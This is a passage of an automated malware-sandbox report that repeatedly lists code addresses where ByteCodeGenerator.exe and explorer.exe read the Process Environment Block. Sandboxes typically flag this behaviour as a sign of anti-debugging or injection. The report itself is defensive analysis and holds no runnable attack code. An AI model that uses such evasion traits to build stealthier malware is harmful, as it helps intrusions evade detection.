Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F0EA5 mov eax, dword ptr fs:[00000030h]	3_2_034F0EA5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A46A7 mov eax, dword ptr fs:[00000030h]	3_2_034A46A7
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03463D43 mov eax, dword ptr fs:[00000030h]	3_2_03463D43
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A3540 mov eax, dword ptr fs:[00000030h]	3_2_034A3540
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03447D50 mov eax, dword ptr fs:[00000030h]	3_2_03447D50
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344C577 mov eax, dword ptr fs:[00000030h]	3_2_0344C577
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344C577 mov eax, dword ptr fs:[00000030h]	3_2_0344C577
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0342AD30 mov eax, dword ptr fs:[00000030h]	3_2_0342AD30
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]	3_2_03433D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EE539 mov eax, dword ptr fs:[00000030h]	3_2_034EE539
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F8D34 mov eax, dword ptr fs:[00000030h]	3_2_034F8D34
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034AA537 mov eax, dword ptr fs:[00000030h]	3_2_034AA537
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03454D3B mov eax, dword ptr fs:[00000030h]	3_2_03454D3B
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03454D3B mov eax, dword ptr fs:[00000030h]	3_2_03454D3B
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03454D3B mov eax, dword ptr fs:[00000030h]	3_2_03454D3B
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	3_2_034A6DC9
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	3_2_034A6DC9
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	3_2_034A6DC9
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6DC9 mov ecx, dword ptr fs:[00000030h]	3_2_034A6DC9
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	3_2_034A6DC9
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	3_2_034A6DC9
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343D5E0 mov eax, dword ptr fs:[00000030h]	3_2_0343D5E0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343D5E0 mov eax, dword ptr fs:[00000030h]	3_2_0343D5E0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EFDE2 mov eax, dword ptr fs:[00000030h]	3_2_034EFDE2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EFDE2 mov eax, dword ptr fs:[00000030h]	3_2_034EFDE2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EFDE2 mov eax, dword ptr fs:[00000030h]	3_2_034EFDE2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034EFDE2 mov eax, dword ptr fs:[00000030h]	3_2_034EFDE2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034D8DF1 mov eax, dword ptr fs:[00000030h]	3_2_034D8DF1
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03452581 mov eax, dword ptr fs:[00000030h]	3_2_03452581
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03452581 mov eax, dword ptr fs:[00000030h]	3_2_03452581
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03452581 mov eax, dword ptr fs:[00000030h]	3_2_03452581
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03452581 mov eax, dword ptr fs:[00000030h]	3_2_03452581
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]	3_2_03422D8A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]	3_2_03422D8A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]	3_2_03422D8A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]	3_2_03422D8A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]	3_2_03422D8A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345FD9B mov eax, dword ptr fs:[00000030h]	3_2_0345FD9B
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345FD9B mov eax, dword ptr fs:[00000030h]	3_2_0345FD9B
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F05AC mov eax, dword ptr fs:[00000030h]	3_2_034F05AC
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F05AC mov eax, dword ptr fs:[00000030h]	3_2_034F05AC
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034535A1 mov eax, dword ptr fs:[00000030h]	3_2_034535A1
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03451DB5 mov eax, dword ptr fs:[00000030h]	3_2_03451DB5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03451DB5 mov eax, dword ptr fs:[00000030h]	3_2_03451DB5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03451DB5 mov eax, dword ptr fs:[00000030h]	3_2_03451DB5
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345A44B mov eax, dword ptr fs:[00000030h]	3_2_0345A44B
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BC450 mov eax, dword ptr fs:[00000030h]	3_2_034BC450
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034BC450 mov eax, dword ptr fs:[00000030h]	3_2_034BC450
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0344746D mov eax, dword ptr fs:[00000030h]	3_2_0344746D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6C0A mov eax, dword ptr fs:[00000030h]	3_2_034A6C0A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6C0A mov eax, dword ptr fs:[00000030h]	3_2_034A6C0A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6C0A mov eax, dword ptr fs:[00000030h]	3_2_034A6C0A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6C0A mov eax, dword ptr fs:[00000030h]	3_2_034A6C0A
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F740D mov eax, dword ptr fs:[00000030h]	3_2_034F740D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F740D mov eax, dword ptr fs:[00000030h]	3_2_034F740D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F740D mov eax, dword ptr fs:[00000030h]	3_2_034F740D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]	3_2_034E1C06
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0345BC2C mov eax, dword ptr fs:[00000030h]	3_2_0345BC2C
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034F8CD6 mov eax, dword ptr fs:[00000030h]	3_2_034F8CD6
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034E14FB mov eax, dword ptr fs:[00000030h]	3_2_034E14FB
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6CF0 mov eax, dword ptr fs:[00000030h]	3_2_034A6CF0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6CF0 mov eax, dword ptr fs:[00000030h]	3_2_034A6CF0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034A6CF0 mov eax, dword ptr fs:[00000030h]	3_2_034A6CF0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0343849B mov eax, dword ptr fs:[00000030h]	3_2_0343849B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C7D50 mov eax, dword ptr fs:[00000030h]	12_2_055C7D50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CB944 mov eax, dword ptr fs:[00000030h]	12_2_055CB944
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CB944 mov eax, dword ptr fs:[00000030h]	12_2_055CB944
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E3D43 mov eax, dword ptr fs:[00000030h]	12_2_055E3D43
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05623540 mov eax, dword ptr fs:[00000030h]	12_2_05623540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AB171 mov eax, dword ptr fs:[00000030h]	12_2_055AB171
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AB171 mov eax, dword ptr fs:[00000030h]	12_2_055AB171
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CC577 mov eax, dword ptr fs:[00000030h]	12_2_055CC577
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CC577 mov eax, dword ptr fs:[00000030h]	12_2_055CC577
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AC962 mov eax, dword ptr fs:[00000030h]	12_2_055AC962
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05678D34 mov eax, dword ptr fs:[00000030h]	12_2_05678D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0562A537 mov eax, dword ptr fs:[00000030h]	12_2_0562A537
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A9100 mov eax, dword ptr fs:[00000030h]	12_2_055A9100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A9100 mov eax, dword ptr fs:[00000030h]	12_2_055A9100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A9100 mov eax, dword ptr fs:[00000030h]	12_2_055A9100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566E539 mov eax, dword ptr fs:[00000030h]	12_2_0566E539
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D4D3B mov eax, dword ptr fs:[00000030h]	12_2_055D4D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D4D3B mov eax, dword ptr fs:[00000030h]	12_2_055D4D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D4D3B mov eax, dword ptr fs:[00000030h]	12_2_055D4D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D513A mov eax, dword ptr fs:[00000030h]	12_2_055D513A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D513A mov eax, dword ptr fs:[00000030h]	12_2_055D513A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AAD30 mov eax, dword ptr fs:[00000030h]	12_2_055AAD30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]	12_2_055B3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C4120 mov eax, dword ptr fs:[00000030h]	12_2_055C4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C4120 mov eax, dword ptr fs:[00000030h]	12_2_055C4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C4120 mov eax, dword ptr fs:[00000030h]	12_2_055C4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C4120 mov eax, dword ptr fs:[00000030h]	12_2_055C4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C4120 mov ecx, dword ptr fs:[00000030h]	12_2_055C4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566FDE2 mov eax, dword ptr fs:[00000030h]	12_2_0566FDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566FDE2 mov eax, dword ptr fs:[00000030h]	12_2_0566FDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566FDE2 mov eax, dword ptr fs:[00000030h]	12_2_0566FDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566FDE2 mov eax, dword ptr fs:[00000030h]	12_2_0566FDE2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056341E8 mov eax, dword ptr fs:[00000030h]	12_2_056341E8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05658DF1 mov eax, dword ptr fs:[00000030h]	12_2_05658DF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]	12_2_05626DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]	12_2_05626DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]	12_2_05626DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626DC9 mov ecx, dword ptr fs:[00000030h]	12_2_05626DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]	12_2_05626DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626DC9 mov eax, dword ptr fs:[00000030h]	12_2_05626DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AB1E1 mov eax, dword ptr fs:[00000030h]	12_2_055AB1E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AB1E1 mov eax, dword ptr fs:[00000030h]	12_2_055AB1E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AB1E1 mov eax, dword ptr fs:[00000030h]	12_2_055AB1E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BD5E0 mov eax, dword ptr fs:[00000030h]	12_2_055BD5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BD5E0 mov eax, dword ptr fs:[00000030h]	12_2_055BD5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056269A6 mov eax, dword ptr fs:[00000030h]	12_2_056269A6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DFD9B mov eax, dword ptr fs:[00000030h]	12_2_055DFD9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DFD9B mov eax, dword ptr fs:[00000030h]	12_2_055DFD9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056705AC mov eax, dword ptr fs:[00000030h]	12_2_056705AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056705AC mov eax, dword ptr fs:[00000030h]	12_2_056705AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D2990 mov eax, dword ptr fs:[00000030h]	12_2_055D2990
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]	12_2_055A2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]	12_2_055A2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]	12_2_055A2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]	12_2_055A2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A2D8A mov eax, dword ptr fs:[00000030h]	12_2_055A2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DA185 mov eax, dword ptr fs:[00000030h]	12_2_055DA185
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056251BE mov eax, dword ptr fs:[00000030h]	12_2_056251BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056251BE mov eax, dword ptr fs:[00000030h]	12_2_056251BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056251BE mov eax, dword ptr fs:[00000030h]	12_2_056251BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056251BE mov eax, dword ptr fs:[00000030h]	12_2_056251BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D2581 mov eax, dword ptr fs:[00000030h]	12_2_055D2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D2581 mov eax, dword ptr fs:[00000030h]	12_2_055D2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D2581 mov eax, dword ptr fs:[00000030h]	12_2_055D2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D2581 mov eax, dword ptr fs:[00000030h]	12_2_055D2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CC182 mov eax, dword ptr fs:[00000030h]	12_2_055CC182
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D1DB5 mov eax, dword ptr fs:[00000030h]	12_2_055D1DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D1DB5 mov eax, dword ptr fs:[00000030h]	12_2_055D1DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D1DB5 mov eax, dword ptr fs:[00000030h]	12_2_055D1DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D35A1 mov eax, dword ptr fs:[00000030h]	12_2_055D35A1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D61A0 mov eax, dword ptr fs:[00000030h]	12_2_055D61A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D61A0 mov eax, dword ptr fs:[00000030h]	12_2_055D61A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C0050 mov eax, dword ptr fs:[00000030h]	12_2_055C0050
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C0050 mov eax, dword ptr fs:[00000030h]	12_2_055C0050
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05671074 mov eax, dword ptr fs:[00000030h]	12_2_05671074
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05662073 mov eax, dword ptr fs:[00000030h]	12_2_05662073
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DA44B mov eax, dword ptr fs:[00000030h]	12_2_055DA44B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C746D mov eax, dword ptr fs:[00000030h]	12_2_055C746D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563C450 mov eax, dword ptr fs:[00000030h]	12_2_0563C450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563C450 mov eax, dword ptr fs:[00000030h]	12_2_0563C450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05661C06 mov eax, dword ptr fs:[00000030h]	12_2_05661C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626C0A mov eax, dword ptr fs:[00000030h]	12_2_05626C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626C0A mov eax, dword ptr fs:[00000030h]	12_2_05626C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626C0A mov eax, dword ptr fs:[00000030h]	12_2_05626C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626C0A mov eax, dword ptr fs:[00000030h]	12_2_05626C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0567740D mov eax, dword ptr fs:[00000030h]	12_2_0567740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0567740D mov eax, dword ptr fs:[00000030h]	12_2_0567740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0567740D mov eax, dword ptr fs:[00000030h]	12_2_0567740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]	12_2_055D002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]	12_2_055D002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]	12_2_055D002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]	12_2_055D002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D002D mov eax, dword ptr fs:[00000030h]	12_2_055D002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BB02A mov eax, dword ptr fs:[00000030h]	12_2_055BB02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BB02A mov eax, dword ptr fs:[00000030h]	12_2_055BB02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BB02A mov eax, dword ptr fs:[00000030h]	12_2_055BB02A
